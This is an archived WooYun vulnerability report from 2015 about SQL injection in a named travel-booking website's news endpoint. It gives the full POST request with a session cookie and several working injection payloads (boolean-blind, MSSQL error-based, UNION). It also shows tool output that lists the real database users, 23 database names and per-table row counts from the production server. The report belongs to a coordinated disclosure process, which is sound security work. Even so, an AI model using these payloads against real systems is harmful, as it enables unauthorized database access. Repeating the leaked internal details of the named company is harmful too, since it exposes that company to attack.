乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
233
POST /NewEdition/YeeGoNews/NewsList.aspx HTTP/1.1Content-Length: 105Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.rtpnr.comCookie: ASP.NET_SessionId=1vofiirwz12vru45ppck0kbx; CheckCode=7036Host: www.rtpnr.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*newscode=1&pageindex=1&pagesize=8&Type=GetTradeNews测试payload:newscode=YGO0001'%20AND%203*2*1%3d6%20AND%20'000ztv7'%3d'000ztv7newscode=YGO0001'%20AND%203*2*2%3d6%20AND%20'000ztv7'%3d'000ztv7
---Parameter: newscode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newscode=YGO0001' AND 6260=6260 AND 'XCap'='XCap&pageindex=1&pagesize=8&Type=GetTradeNews Vector: AND [INFERENCE] Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: newscode=YGO0001' AND 9555=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9555=9555) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'PWvn'='PWvn&pageindex=1&pagesize=8&Type=GetTradeNews Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: newscode=YGO0001' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(85)+CHAR(111)+CHAR(116)+CHAR(66)+CHAR(120)+CHAR(84)+CHAR(72)+CHAR(122)+CHAR(90)+CHAR(106)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113)-- &pageindex=1&pagesize=8&Type=GetTradeNews Vector: UNION ALL SELECT [QUERY]-- ---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008database management system users [2]:[*] sa[*] YeeGoWebavailable databases [23]:[*] AutoTicket[*] BACKUP[*] distribution[*] master[*] model[*] MonitorBlocking[*] msdb[*] Temp2015[*] tempdb[*] tslwp[*] YeeGo_BackUp[*] YeeGo_History[*] YeeGo_Order[*] YeeGoCopy[*] YeeGoLog[*] YeeGoTemp[*] YeeGoUser[*] YeeSkyBillings[*] YeeSkyGo_TEST[*] YeeSkyGoLog_History[*] Yeesoho_test[*] YSK_SAAS_History[*] YSK_SAAS_TESTDatabase: AutoTicket+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| dbo.T_ReceivingOrder_Log_20150509 | 4828407 || dbo.T_ReceivingOrder_Log_20150505 | 4761384 || dbo.T_ReceivingOrder_Log_20150506 | 4725686 || dbo.T_ReceivingOrder_Log_20150427 | 4679033 || dbo.T_ReceivingOrder_Log_20150503 | 4663783 || dbo.T_ReceivingOrder_Log_20150501 | 4661247 || dbo.T_ReceivingOrder_Log_20150417 | 4615511 || dbo.T_ReceivingOrder_Log_20150416 | 4578616 || dbo.T_ReceivingOrder_Log_20150423 | 4555551 || dbo.T_ReceivingOrder_Log_20150508 | 4537936 || dbo.T_ReceivingOrder_Log_20150504 | 4529144 || dbo.T_ReceivingOrder_Log_20150502 | 4513908 || dbo.T_ReceivingOrder_Log_20150428 | 4458769 || dbo.T_ReceivingOrder_Log_20150424 | 4426906 || dbo.T_ReceivingOrder_Log_20150430 | 4404906 || dbo.T_ReceivingOrder_Log_20150325 | 4386799 || dbo.T_ReceivingOrder_Log_20150429 | 4357274 || dbo.T_ReceivingOrder_Log_20150421 | 4356534 || dbo.T_ReceivingOrder_Log_20150418 | 4344581 || dbo.T_ReceivingOrder_Log_20150425 | 4338758 || dbo.T_ReceivingOrder_Log_20150419 | 4330283 || dbo.T_ReceivingOrder_Log_20150420 | 4322006 || dbo.T_ReceivingOrder_Log_20150320 | 4313560 || dbo.T_ReceivingOrder_Log_20150319 | 4276456 || dbo.T_ReceivingOrder_Log_20150311 | 4275833 || dbo.T_ReceivingOrder_Log_20150422 | 4270772 || dbo.T_ReceivingOrder_Log_20150426 | 4245304 || dbo.T_ReceivingOrder_Log_20141230 | 4209479 || dbo.T_ReceivingOrder_Log_20150321 | 4192467 || dbo.T_ReceivingOrder_Log_20150415 | 4150012 || dbo.T_ReceivingOrder_Log_20150507 | 4137469 || dbo.T_ReceivingOrder_Log_20150326 | 4117875 || dbo.T_ReceivingOrder_Log_20150324 | 4104741 || dbo.T_ReceivingOrder_Log_20150403 | 4084876 || dbo.T_ReceivingOrder_Log_20150318 | 4070910 || dbo.T_ReceivingOrder_Log_20150414 | 4046374 || dbo.T_ReceivingOrder_Log_20141231 | 4036910 || dbo.T_ReceivingOrder_Log_20150312 | 4000171 || dbo.T_ReceivingOrder_Log_20150402 | 3998813 || dbo.T_ReceivingOrder_Log_20150322 | 3946956 || dbo.T_ReceivingOrder_Log_20150323 | 3929905 || dbo.T_ReceivingOrder_Log_20150327 | 3913425 || dbo.T_ReceivingOrder_Log_20150331 | 3906339 || dbo.T_ReceivingOrder_Log_20150317 | 3898811 || dbo.T_ReceivingOrder_Log_20150409 | 3897456 || dbo.T_ReceivingOrder_Log_20150413 | 3888902 || dbo.T_ReceivingOrder_Log_20150328 | 3885350 || dbo.T_ReceivingOrder_Log_20150408 | 3877437 || dbo.T_ReceivingOrder_Log_20150411 | 3821738 || dbo.T_ReceivingOrder_Log_20150330 | 3817518 || dbo.T_ReceivingOrder_Log_20150313 | 3813373 || dbo.T_ReceivingOrder_Log_20150407 | 3801984 || dbo.T_ReceivingOrder_Log_20150412 | 3798156 || dbo.T_ReceivingOrder_Log_20150401 | 3784647 || dbo.T_ReceivingOrder_Log_20141229 | 3770215 || dbo.T_ReceivingOrder_Log_20150329 | 3758350 || dbo.T_ReceivingOrder_Log_20150314 | 3715299 || dbo.T_ReceivingOrder_Log_20150316 | 3709434 || dbo.T_ReceivingOrder_Log_20150406 | 3699308 || dbo.T_ReceivingOrder_Log_20150404 | 3670486 || dbo.T_ReceivingOrder_Log_20150315 | 3621205 || dbo.T_ReceivingOrder_Log_20150405 | 3573067 || dbo.T_ReceivingOrder_Log_20150410 | 3545505 || dbo.T_ReceivingOrder_Log_20150510 | 3265968 |+-----------------------------------+---------+
~~
危害等级:高
漏洞Rank:20
确认时间:2015-05-11 14:09
感谢反馈!
暂无